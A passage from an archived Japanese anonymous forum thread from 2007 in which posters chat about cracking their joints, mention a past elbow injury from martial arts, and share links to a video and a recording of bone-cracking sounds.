格闘技やってて、両腕の肘関節を腕十字でグシャッとやったことがある。
それ以来、両肘を逆に曲げるようにするとゴキっと鳴ってキモチいい。

380 :名無しの愉しみ:2007/01/09(火) 05:02:47 ID:???
>>378
うpうp!゚∀゚)

381 :名無しの愉しみ:2007/01/10(水) 13:32:55 ID:pGLT3jws
加藤ローサのずれた骨盤をなおそう!
ttp://www.youtube.com/watch?v=YXa4IDbmagI

382 :名無しの愉しみ:2007/01/10(水) 15:31:54 ID:???
ちょっとした試み
骨を鳴らしたから録音してみた。
音が結構恐いから苦手な人は聴かないで下さい。

http://i.pic.to/a5cs8

383 :名無しの愉しみ:2007/01/10(水) 17:29:55 ID:???
>>382
PCで見れねぇよ

93 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)